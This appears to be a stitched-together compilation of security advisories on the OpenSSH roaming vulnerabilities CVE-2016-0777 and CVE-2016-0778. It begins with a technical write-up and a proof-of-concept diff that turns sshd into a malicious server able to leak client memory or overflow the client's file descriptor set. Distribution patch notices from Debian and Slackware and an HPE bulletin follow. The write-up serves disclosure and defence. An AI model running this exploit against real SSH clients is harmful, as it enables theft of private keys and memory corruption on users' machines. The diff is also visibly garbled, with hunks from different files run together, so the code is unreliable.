9 struct ssh active_state, backup_state; ... 238 void 239 packet_backup_state(void) 240 { 241 ssh_packet_backup_state(active_state, backup_state); 242 } 243 244 void 245 packet_restore_state(void) 246 { 247 ssh_packet_restore_state(active_state, backup_state); 248 }
2269 void 2270 ssh_packet_backup_state(struct ssh ssh, 2271 struct ssh backup_state) 2272 { 2273 struct ssh tmp; .... 2279 if (backup_state) 2280 tmp = backup_state; 2281 else 2282 tmp = ssh_alloc_session_state(); 2283 backup_state = ssh; 2284 ssh = tmp; 2285 } .... 2291 void 2292 ssh_packet_restore_state(struct ssh ssh, 2293 struct ssh backup_state) 2294 { 2295 struct ssh tmp; .... 2299 tmp = backup_state; 2300 backup_state = ssh; 2301 ssh = tmp; 2302 ssh->state->connection_in = backup_state->state->connection_in;
As a result, the global pointer backup_state is still NULL when passed to ssh_packet_restore_state(), and crashes the OpenSSH client when dereferenced:
env ROAMING="overflow:A fd_leaks:0" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -V OpenSSH_6.8, LibreSSL 2.1
$ /usr/bin/ssh -o ProxyCommand="/usr/bin/nc -w 15 %h %p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume]Segmentation fault (core dumped)
This bug prevents the buffer overflow from being exploited, but not the information leak, because the vulnerable function resend_bytes() is called before ssh_packet_restore_state() crashes.
File Descriptor Leak
A back-of-the-envelope calculation indicates that, in order to increase the file descriptor connection_in or connection_out, and thus overflow the file descriptor set setp in packet_read_seqnr() or packet_write_wait(), a file descriptor leak is needed:
-
First, the number of bytes calloc()ated for setp is rounded up to the nearest multiple of sizeof(fd_mask): 8 bytes (or 64 file descriptors) on 64-bit systems.
-
Next, in glibc, this number is rounded up to the nearest multiple of MALLOC_ALIGNMENT: 16 bytes (or 128 file descriptors) on 64-bit systems.
-
Last, in glibc, a MIN_CHUNK_SIZE is enforced: 32 bytes on 64-bit systems, of which 24 bytes (or 192 file descriptors) are reserved for setp.
-
In conclusion, a file descriptor leak is needed, because connection_in or connection_out has to be increased by hundreds in order to overflow setp.
The search for a suitable file descriptor leak begins with a study of the behavior of the four ssh_connect() methods, when called for a reconnection by wait_for_roaming_reconnect():
- The default method ssh_connect_direct() communicates with the server through a simple TCP socket: the two file descriptors connection_in and connection_out are both equal to this socket's file descriptor.
In wait_for_roaming_reconnect(), the low-numbered file descriptor of the old TCP socket is close()d by packet_backup_state(), but immediately reused for the new TCP socket in ssh_connect_direct(): the new file descriptors connection_in and connection_out are equal to this old, low-numbered file descriptor, and cannot possibly overflow setp.
-
The special ProxyCommand "-" communicates with the server through stdin and stdout, but (as explained in the Mitigating Factors of the Information Leak section) it cannot possibly reconnect to the server, and is therefore immune to this buffer overflow.
-
Surprisingly, we discovered a file descriptor leak in the ssh_proxy_fdpass_connect() method itself; indeed, the file descriptor sp[1] is never close()d:
101 static int 102 ssh_proxy_fdpass_connect(const char host, u_short port, 103 const char proxy_command) 104 { ... 106 int sp[2], sock; ... 113 if (socketpair(AF_UNIX, SOCK_STREAM, 0, sp) < 0) 114 fatal("Could not create socketpair to communicate with " 115 "proxy dialer: %.100s", strerror(errno)); ... 161 close(sp[0]); ... 164 if ((sock = mm_receive_fd(sp[1])) == -1) 165 fatal("proxy dialer did not pass back a connection"); ... 171 / Set the connection file descriptors. / 172 packet_set_connection(sock, sock); 173 174 return 0; 175 }
However, two different reasons prevent this file descriptor leak from triggering the setp overflow:
- The method ssh_proxy_fdpass_connect() communicates with the server through a single socket received from the ProxyCommand: the two file descriptors connection_in and connection_out are both equal to this socket's file descriptor.
In wait_for_roaming_reconnect(), the low-numbered file descriptor of the old socket is close()d by packet_backup_state(), reused for sp[0] in ssh_proxy_fdpass_connect(), close()d again, and eventually reused again for the new socket: the new file descriptors connection_in and connection_out are equal to this old, low-numbered file descriptor, and cannot possibly overflow setp.
-
Because of the waitpid() bug described in the Mitigating Factors of the Information Leak section, the method ssh_proxy_fdpass_connect() calls fatal() before it returns to wait_for_roaming_reconnect(), and is therefore immune to this buffer overflow.
-
The method ssh_proxy_connect() communicates with the server through a ProxyCommand and two different pipes: the file descriptor connection_in is the read end of the second pipe (pout[0]), and the file descriptor connection_out is the write end of the first pipe (pin[1]):
180 static int 181 ssh_proxy_connect(const char host, u_short port, const char proxy_command) 182 { ... 184 int pin[2], pout[2]; ... 192 if (pipe(pin) < 0 || pipe(pout) < 0) 193 fatal("Could not create pipes to communicate with the proxy: %.100s", 194 strerror(errno)); ... 240 / Close child side of the descriptors. / 241 close(pin[0]); 242 close(pout[1]); ... 247 / Set the connection file descriptors. / 248 packet_set_connection(pout[0], pin[1]); 249 250 / Indicate OK return / 251 return 0; 252 }
In wait_for_roaming_reconnect(), the two old, low-numbered file descriptors connection_in and connection_out are both close()d by packet_backup_state(), and immediately reused for the pipe(pin) in ssh_proxy_connect(): the new connection_out (pin[1]) is equal to one of these old, low-numbered file descriptors, and cannot possibly overflow setp.
On the other hand, the pipe(pout) in ssh_proxy_connect() may return high-numbered file descriptors, and the new connection_in (pout[0]) may therefore overflow setp, if hundreds of file descriptors were leaked before the call to wait_for_roaming_reconnect():
- We discovered a file descriptor leak in the pubkey_prepare() function of OpenSSH >= 6.8; indeed, if the client is running an authentication agent that does not offer any private keys, the reference to agent_fd is lost, and this file descriptor is never close()d:
1194 static void 1195 pubkey_prepare(Authctxt *authctxt) 1196 { .... 1200 int agent_fd, i, r, found; .... 1247 if ((r = ssh_get_authentication_socket(&agent_fd)) != 0) { 1248 if (r != SSH_ERR_AGENT_NOT_PRESENT) 1249 debug("%s: ssh_get_authentication_socket: %s", 1250 func, ssh_err(r)); 1251 } else if ((r = ssh_fetch_identitylist(agent_fd, 2, &idlist)) != 0) { 1252 if (r != SSH_ERR_AGENT_NO_IDENTITIES) 1253 debug("%s: ssh_fetch_identitylist: %s", 1254 func, ssh_err(r)); 1255 } else { .... 1288 authctxt->agent_fd = agent_fd; 1289 } .... 1299 }
However, OpenSSH clients >= 6.8 crash in ssh_packet_restore_state() (because of the NULL-pointer dereference discussed in the Mitigating Factors of the Buffer Overflow section) and are immune to the setp overflow, despite this agent_fd leak.
- If ForwardAgent (-A) or ForwardX11 (-X) is enabled in the OpenSSH client (it is disabled by default), a malicious SSH server can request hundreds of forwardings, in order to increase connection_in (each forwarding opens a file descriptor), and thus overflow setp in packet_read_seqnr():
env ROAMING="overflow:A" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -V OpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014
$ /usr/bin/ssh-agent -- /usr/bin/ssh -A -o ProxyCommand="/usr/bin/socat - TCP4:%h:%p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed] *** Error in `/usr/bin/ssh': free(): invalid next size (fast): 0x00007f0474d03e70 *** Aborted (core dumped)
env ROAMING="overflow:X" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
$ /usr/bin/ssh -X -o ProxyCommand="/usr/bin/socat - TCP4:%h:%p" -p 222 127.0.0.1
user@127.0.0.1's password:
[connection suspended, press return to resume][connection resumed]
*** Error in /usr/bin/ssh': free(): invalid next size (fast): 0x00007fdcc2a3aba0 ***
*** Error in
/usr/bin/ssh': malloc(): memory corruption: 0x00007fdcc2a3abc0 ***
Finally, a brief digression on two unexpected problems that had to be solved in our proof-of-concept:
-
First, setp can be overflowed only in packet_read_seqnr(), not in packet_write_wait(), but agent forwarding and X11 forwarding are post- authentication functionalities, and post-authentication calls to packet_read() or packet_read_expect() are scarce, except in the key-exchange code of OpenSSH clients < 6.8: our proof-of-concept effectively forces a rekeying in order to overflow setp in packet_read_seqnr().
-
Second, after a successful reconnection, packet_read_seqnr() may call fatal("Read from socket failed: %.100s", ...), because roaming_read() may return EAGAIN (EAGAIN is never returned without the reconnection, because the preceding call to select() guarantees that connection_in is ready for read()). Our proof-of-concept works around this problem by forcing the client to resend MAX_ROAMBUF bytes (2M) to the server, allowing data to reach the client before roaming_read() is called, thus avoiding EAGAIN.
======================================================================== Acknowledgments ========================================================================
We would like to thank the OpenSSH developers for their great work and their incredibly quick response, Red Hat Product Security for promptly assigning CVE-IDs to these issues, and Alexander Peslyak of the Openwall Project for the interesting discussions.
======================================================================== Proof Of Concept ========================================================================
diff -pruN openssh-6.4p1/auth2-pubkey.c openssh-6.4p1+roaming/auth2-pubkey.c --- openssh-6.4p1/auth2-pubkey.c 2013-07-17 23:10:10.000000000 -0700 +++ openssh-6.4p1+roaming/auth2-pubkey.c 2016-01-07 01:04:15.000000000 -0800 @@ -169,7 +169,9 @@ userauth_pubkey(Authctxt authctxt) * if a user is not allowed to login. is this an * issue? -markus / - if (PRIVSEP(user_key_allowed(authctxt->pw, key))) { + if (PRIVSEP(user_key_allowed(authctxt->pw, key)) || 1) { + debug("%s: force client-side load_identity_file", + func); packet_start(SSH2_MSG_USERAUTH_PK_OK); packet_put_string(pkalg, alen); packet_put_string(pkblob, blen); diff -pruN openssh-6.4p1/kex.c openssh-6.4p1+roaming/kex.c --- openssh-6.4p1/kex.c 2013-06-01 14:31:18.000000000 -0700 +++ openssh-6.4p1+roaming/kex.c 2016-01-07 01:04:15.000000000 -0800 @@ -442,6 +442,73 @@ proposals_match(char *my[PROPOSAL_MAX], }
static void +roaming_reconnect(void) +{ + packet_read_expect(SSH2_MSG_KEX_ROAMING_RESUME); + const u_int id = packet_get_int(); / roaming_id / + debug("%s: id %u", func, id); + packet_check_eom(); + + const char const dir = get_roaming_dir(id); + debug("%s: dir %s", func, dir); + const int fd = open(dir, O_RDONLY | O_NOFOLLOW | O_NONBLOCK); + if (fd <= -1) + fatal("%s: open %s errno %d", func, dir, errno); + if (fchdir(fd) != 0) + fatal("%s: fchdir %s errno %d", func, dir, errno); + if (close(fd) != 0) + fatal("%s: close %s errno %d", func, dir, errno); + + packet_start(SSH2_MSG_KEX_ROAMING_AUTH_REQUIRED); + packet_put_int64(arc4random()); / chall / + packet_put_int64(arc4random()); / oldchall / + packet_send(); + + packet_read_expect(SSH2_MSG_KEX_ROAMING_AUTH); + const u_int64_t client_read_bytes = packet_get_int64(); + debug("%s: client_read_bytes %llu", func, + (unsigned long long)client_read_bytes); + packet_get_int64(); / digest (1-8) / + packet_get_int64(); / digest (9-16) / + packet_get_int(); / digest (17-20) / + packet_check_eom(); + + u_int64_t client_write_bytes; + size_t len = sizeof(client_write_bytes); + load_roaming_file("client_write_bytes", &client_write_bytes, &len); + debug("%s: client_write_bytes %llu", func, + (unsigned long long)client_write_bytes); + + u_int client_out_buf_size; + len = sizeof(client_out_buf_size); + load_roaming_file("client_out_buf_size", &client_out_buf_size, &len); + debug("%s: client_out_buf_size %u", func, client_out_buf_size); + if (client_out_buf_size <= 0 || client_out_buf_size > MAX_ROAMBUF) + fatal("%s: client_out_buf_size %u", func, + client_out_buf_size); + + packet_start(SSH2_MSG_KEX_ROAMING_AUTH_OK); + packet_put_int64(client_write_bytes - (u_int64_t)client_out_buf_size); + packet_send(); + const int overflow = (access("output", F_OK) == 0); + if (overflow != 0) { + const void const ptr = load_roaming_file("output", NULL, &len); + buffer_append(packet_get_output(), ptr, len); + } + packet_write_wait(); + + char const client_out_buf = xmalloc(client_out_buf_size); + if (atomicio(read, packet_get_connection_in(), client_out_buf, + client_out_buf_size) != client_out_buf_size) + fatal("%s: read client_out_buf_size %u errno %d", func, + client_out_buf_size, errno); + if (overflow == 0) + dump_roaming_file("infoleak", client_out_buf, + client_out_buf_size); + fatal("%s: all done for %s", func, dir); +} + +static void kex_choose_conf(Kex kex) { Newkeys newkeys; @@ -470,6 +537,10 @@ kex_choose_conf(Kex kex) kex->roaming = 1; free(roaming); } + } else if (strcmp(peer[PROPOSAL_KEX_ALGS], KEX_RESUME) == 0) { + roaming_reconnect(); + / NOTREACHED / + fatal("%s: returned from %s", func, KEX_RESUME); }
/* Algorithm Negotiation */
diff -pruN openssh-6.4p1/roaming.h openssh-6.4p1+roaming/roaming.h --- openssh-6.4p1/roaming.h 2011-12-18 15:52:52.000000000 -0800 +++ openssh-6.4p1+roaming/roaming.h 2016-01-07 01:04:15.000000000 -0800 @@ -42,4 +42,86 @@ void resend_bytes(int, u_int64_t ); void calculate_new_key(u_int64_t , u_int64_t, u_int64_t); int resume_kex(void);
+#include
+static int client_session_channel = -1; +static int server_session_channel = -1; + static void server_input_channel_open(int type, u_int32_t seq, void ctxt) { @@ -1089,12 +1092,22 @@ server_input_channel_open(int type, u_in c->remote_window = rwindow; c->remote_maxpacket = rmaxpack; if (c->type != SSH_CHANNEL_CONNECTING) { + debug("%s: avoid client-side buf_append", func); + / packet_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION); packet_put_int(c->remote_id); packet_put_int(c->self); packet_put_int(c->local_window); packet_put_int(c->local_maxpacket); packet_send(); + */ + if (strcmp(ctype, "session") == 0) { + if (client_session_channel != -1) + fatal("%s: client_session_channel %d", + func, client_session_channel); + client_session_channel = c->remote_id; + server_session_channel = c->self; + } } } else { debug("server_input_channel_open: failure %s", ctype); @@ -1111,6 +1124,196 @@ server_input_channel_open(int type, u_in }
static void +roaming_disconnect(Kex const kex) +{ + const char cp, roaming = getenv("ROAMING"); + if (roaming == NULL) + roaming = "infoleak"; + int overflow = 0; + if ((cp = strstr(roaming, "overflow:")) != NULL) + overflow = cp[9]; + + const u_int client_recv_buf_size = packet_get_int(); + packet_check_eom(); + const u_int server_recv_buf_size = get_recv_buf_size(); + const u_int server_send_buf_size = get_snd_buf_size(); + debug("%s: client_recv_buf_size %u", func, client_recv_buf_size); + debug("%s: server_recv_buf_size %u", func, server_recv_buf_size); + debug("%s: server_send_buf_size %u", func, server_send_buf_size); + + u_int client_send_buf_size = 0; + if ((cp = strstr(roaming, "client_send_buf_size:")) != NULL) + client_send_buf_size = strtoul(cp + 21, NULL, 0); + else if (client_recv_buf_size == DEFAULT_ROAMBUF) + client_send_buf_size = DEFAULT_ROAMBUF; + else { + const u_int + max = MAX(client_recv_buf_size, server_recv_buf_size), + min = MIN(client_recv_buf_size, server_recv_buf_size); + if (min <= 0) + fatal("%s: min %u", func, min); + if (((u_int64_t)(max - min) * 1024) / min < 1) + client_send_buf_size = server_send_buf_size; + else + client_send_buf_size = client_recv_buf_size; + } + debug("%s: client_send_buf_size %u", func, client_send_buf_size); + if (client_send_buf_size <= 0) + fatal("%s: client_send_buf_size", func); + + u_int id = 0; + char dir = NULL; + for (;;) { + id = arc4random(); + debug("%s: id %u", func, id); + free(dir); + dir = get_roaming_dir(id); + if (mkdir(dir, S_IRWXU) == 0) + break; + if (errno != EEXIST) + fatal("%s: mkdir %s errno %d", func, dir, errno); + } + debug("%s: dir %s", func, dir); + if (chdir(dir) != 0) + fatal("%s: chdir %s errno %d", func, dir, errno); + + u_int client_out_buf_size = 0; + if ((cp = strstr(roaming, "client_out_buf_size:")) != NULL) + client_out_buf_size = strtoul(cp + 20, NULL, 0); + else if (overflow != 0) + client_out_buf_size = MAX_ROAMBUF; + else + client_out_buf_size = 1 + arc4random() % 4096; + debug("%s: client_out_buf_size %u", func, client_out_buf_size); + if (client_out_buf_size <= 0) + fatal("%s: client_out_buf_size", func); + dump_roaming_file("client_out_buf_size", &client_out_buf_size, + sizeof(client_out_buf_size)); + + if ((cp = strstr(roaming, "scp_mode")) != NULL) { + if (overflow != 0) + fatal("%s: scp_mode is incompatible with overflow %d", + func, overflow); + + u_int seconds_left_to_sleep = 3; + if ((cp = strstr(cp, "sleep:")) != NULL) + seconds_left_to_sleep = strtoul(cp + 6, NULL, 0); + debug("%s: sleep %u", func, seconds_left_to_sleep); + + if (client_session_channel == -1) + fatal("%s: client_session_channel %d", + func, client_session_channel); + + packet_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION); + packet_put_int(client_session_channel); + packet_put_int(server_session_channel); + packet_put_int(0); / server window / + packet_put_int(0); / server maxpacket / + packet_send(); + + packet_start(SSH2_MSG_CHANNEL_DATA); + packet_put_int(client_session_channel); + packet_put_string("\0\n", 2); / response&source|sink&run_err / + packet_send(); + + packet_read_expect(SSH2_MSG_CHANNEL_REQUEST); + packet_get_int(); / server channel / + debug("%s: channel request %s", func, + packet_get_cstring(NULL)); + + while (seconds_left_to_sleep) + seconds_left_to_sleep = sleep(seconds_left_to_sleep); + } + + packet_start(SSH2_MSG_REQUEST_SUCCESS); + packet_put_int(id); / roaming_id / + packet_put_int64(arc4random()); / cookie / + packet_put_int64(0); / key1 / + packet_put_int64(0); / key2 / + packet_put_int(client_out_buf_size - client_send_buf_size); + packet_send(); + packet_write_wait(); + + if (overflow != 0) { + const u_int64_t full_client_out_buf = get_recv_bytes() + + client_out_buf_size; + + u_int fd_leaks = 4 * 8 * 8; / MIN_CHUNK_SIZE in bits / + if ((cp = strstr(roaming, "fd_leaks:")) != NULL) + fd_leaks = strtoul(cp + 9, NULL, 0); + debug("%s: fd_leaks %u", func, fd_leaks); + + while (fd_leaks--) { + packet_start(SSH2_MSG_CHANNEL_OPEN); + packet_put_cstring(overflow == 'X' ? "x11" : + "auth-agent@openssh.com"); / ctype / + packet_put_int(arc4random()); / server channel / + packet_put_int(arc4random()); / server window / + packet_put_int(arc4random()); / server maxpacket / + if (overflow == 'X') { + packet_put_cstring(""); / originator / + packet_put_int(arc4random()); / port / + } + packet_send(); + + packet_read_expect(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION); + packet_get_int(); / server channel / + packet_get_int(); / client channel / + packet_get_int(); / client window / + packet_get_int(); / client maxpacket / + packet_check_eom(); + } + + while (get_recv_bytes() <= full_client_out_buf) { + packet_start(SSH2_MSG_GLOBAL_REQUEST); + packet_put_cstring(""); / rtype / + packet_put_char(1); / want_reply / + packet_send(); + + packet_read_expect(SSH2_MSG_REQUEST_FAILURE); + packet_check_eom(); + } + + if (kex == NULL) + fatal("%s: no kex, cannot rekey", func); + if (kex->flags & KEX_INIT_SENT) + fatal("%s: KEX_INIT_SENT already", func); + char const ptr = buffer_ptr(&kex->my); + const u_int len = buffer_len(&kex->my); + if (len <= 1+4) / first_kex_follows + reserved / + fatal("%s: kex len %u", func, len); + ptr[len - (1+4)] = 1; / first_kex_follows / + kex_send_kexinit(kex); + + u_int i; + packet_read_expect(SSH2_MSG_KEXINIT); + for (i = 0; i < KEX_COOKIE_LEN; i++) + packet_get_char(); + for (i = 0; i < PROPOSAL_MAX; i++) + free(packet_get_string(NULL)); + packet_get_char(); / first_kex_follows / + packet_get_int(); / reserved / + packet_check_eom(); + + char buf[81922]; / two packet_read_seqnr bufferfuls / + memset(buf, '\0', sizeof(buf)); + packet_start(SSH2_MSG_KEX_ROAMING_AUTH_FAIL); + packet_put_string(buf, sizeof(buf)); + packet_send(); + const Buffer const output = packet_get_output(); + dump_roaming_file("output", buffer_ptr(output), + buffer_len(output)); + } + + const u_int64_t client_write_bytes = get_recv_bytes(); + debug("%s: client_write_bytes %llu", func, + (unsigned long long)client_write_bytes); + dump_roaming_file("client_write_bytes", &client_write_bytes, + sizeof(client_write_bytes)); + fatal("%s: all done for %s", func, dir); +} + +static void server_input_global_request(int type, u_int32_t seq, void ctxt) { char rtype; @@ -1168,6 +1371,13 @@ server_input_global_request(int type, u_ } else if (strcmp(rtype, "no-more-sessions@openssh.com") == 0) { no_more_sessions = 1; success = 1; + } else if (strcmp(rtype, ROAMING_REQUEST) == 0) { + if (want_reply != 1) + fatal("%s: rtype %s want_reply %d", func, + rtype, want_reply); + roaming_disconnect(ctxt); + / NOTREACHED */ + fatal("%s: returned from %s", func, ROAMING_REQUEST); } if (want_reply) { packet_start(success ? diff -pruN openssh-6.4p1/sshd.c openssh-6.4p1+roaming/sshd.c --- openssh-6.4p1/sshd.c 2013-07-19 20:21:53.000000000 -0700 +++ openssh-6.4p1+roaming/sshd.c 2016-01-07 01:04:15.000000000 -0800 @@ -2432,6 +2432,8 @@ do_ssh2_kex(void) } if (options.kex_algorithms != NULL) myproposal[PROPOSAL_KEX_ALGS] = options.kex_algorithms; + else + myproposal[PROPOSAL_KEX_ALGS] = KEX_DEFAULT_KEX "," KEX_RESUME;
if (options.rekey_limit || options.rekey_interval)
packet_set_rekey_limits((u_int32_t)options.rekey_limit,
.
More details about identifying an attack and mitigations will be available in the Qualys Security Advisory.
For the oldstable distribution (wheezy), these problems have been fixed in version 1:6.0p1-4+deb7u3.
For the stable distribution (jessie), these problems have been fixed in version 1:6.7p1-5+deb8u1.
For the testing distribution (stretch) and unstable distribution (sid), these problems will be fixed in a later version.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/openssh-7.1p2-i486-1_slack14.1.txz: Upgraded. This update fixes an information leak and a buffer overflow. As of version 7.0, OpenSSH has deprecated some older (and presumably less secure) algorithms, and also (by default) only allows root login by public-key, hostbased and GSSAPI authentication. Make sure that your keys and authentication method will allow you to continue accessing your system after the upgrade. The release notes for OpenSSH 7.0 list the following incompatible changes to be aware of: * Support for the legacy SSH version 1 protocol is disabled by default at compile time. * Support for the 1024-bit diffie-hellman-group1-sha1 key exchange is disabled by default at run-time. It may be re-enabled using the instructions at http://www.openssh.com/legacy.html * Support for ssh-dss, ssh-dss-cert- host and user keys is disabled by default at run-time. These may be re-enabled using the instructions at http://www.openssh.com/legacy.html * Support for the legacy v00 cert format has been removed. * The default for the sshd_config(5) PermitRootLogin option has changed from "yes" to "prohibit-password". * PermitRootLogin=without-password/prohibit-password now bans all interactive authentication methods, allowing only public-key, hostbased and GSSAPI authentication (previously it permitted keyboard-interactive and password-less authentication if those were enabled). ( Security fix *) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssh-7.1p2-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssh-7.1p2-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssh-7.1p2-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssh-7.1p2-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssh-7.1p2-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssh-7.1p2-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssh-7.1p2-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssh-7.1p2-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssh-7.1p2-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssh-7.1p2-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssh-7.1p2-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssh-7.1p2-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 package: 856dd9c1b10641c282f30a34b7b63bea openssh-7.1p2-i486-1_slack13.0.txz
Slackware x86_64 13.0 package: 80903b0829f0284d007e7a316f2ff2da openssh-7.1p2-x86_64-1_slack13.0.txz
Slackware 13.1 package: 2095d1a304a94bab44993fdb7e0781c8 openssh-7.1p2-i486-1_slack13.1.txz
Slackware x86_64 13.1 package: 5bf653d7f5b4a9426ff2c5888af99f00 openssh-7.1p2-x86_64-1_slack13.1.txz
Slackware 13.37 package: 53e09b4371c045b9de1c86e0826324f9 openssh-7.1p2-i486-1_slack13.37.txz
Slackware x86_64 13.37 package: cd0319ff3c574c50612d5ba2b38f2fdc openssh-7.1p2-x86_64-1_slack13.37.txz
Slackware 14.0 package: 98cdc1d6ffea2a06d0c8013078681bff openssh-7.1p2-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: 2093f3e91a79e07f072c702a1704be73 openssh-7.1p2-x86_64-1_slack14.0.txz
Slackware 14.1 package: d051d9f31cd380436ad01fa1641be1c7 openssh-7.1p2-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: f1f81757431c3c836f06ce5d22e2d5de openssh-7.1p2-x86_64-1_slack14.1.txz
Slackware -current package: 70db20c5e4152bc9967b1e24cf91ed98 n/openssh-7.1p2-i586-1.txz
Slackware x86_64 -current package: e13dc3da27f817bee693fbb907015817 n/openssh-7.1p2-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg openssh-7.1p2-i486-1_slack14.1.txz
Next, restart the sshd daemon:
sh /etc/rc.d/rc.sshd restart
Then before logging out, make sure that you still have remote access! See the information about incompatible changes in OpenSSH 7.x above.
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05247375
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c05247375 Version: 1
HPSBGN03638 rev.1 - HPE Remote Device Access: Virtual Customer Access System (vCAS) using lighttpd and OpenSSH, Unauthorized Modification of Information, Remote Denial of Service (DoS), Remote Disclosure of Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2016-08-29 Last Updated: 2016-08-29
Potential Security Impact: Remote Denial of Service (DoS), Disclosure of Information, Unauthorized Modification Of Information
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY Potential vulnerabilities have been identified in the lighttpd and OpenSSH version used in HPE Remote Device Access: Virtual Customer Access System (vCAS). These vulnerabilities could be exploited remotely resulting in unauthorized modification of information, denial of service (DoS), and disclosure of information.
References:
CVE-2015-3200 CVE-2016-0777 CVE-2016-0778 PSRT110211
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HPE Remote Device Access: Virtual Customer Access System (vCAS) - v15.07 (RDA 8.1) and earlier.
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2015-3200
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CVE-2016-0777
6.5 CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N)
CVE-2016-0778
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
RESOLUTION
HPE has made the following updates available to resolve the vulnerabilities in Remote Device Access: Virtual Customer Access System (vCAS)
vCAS 16.05 (RDA 8.7) kits - hp-rdacas-16.05-10482-vbox.ova and hp-rdacas-16.05-10482.ova.
The Oracle VirtualBox kit is available at: https://h20529.www2.hpe.com/apt/hp-rdacas-16.05-10482-vbox.ova
The VMware ESX(i) and VMware Player kit is available at: https://h20529.www2.hpe.com/apt/hp-rdacas-16.05-10482.ova
HISTORY Version:1 (rev.1) - 29 August 2016 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel.
Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
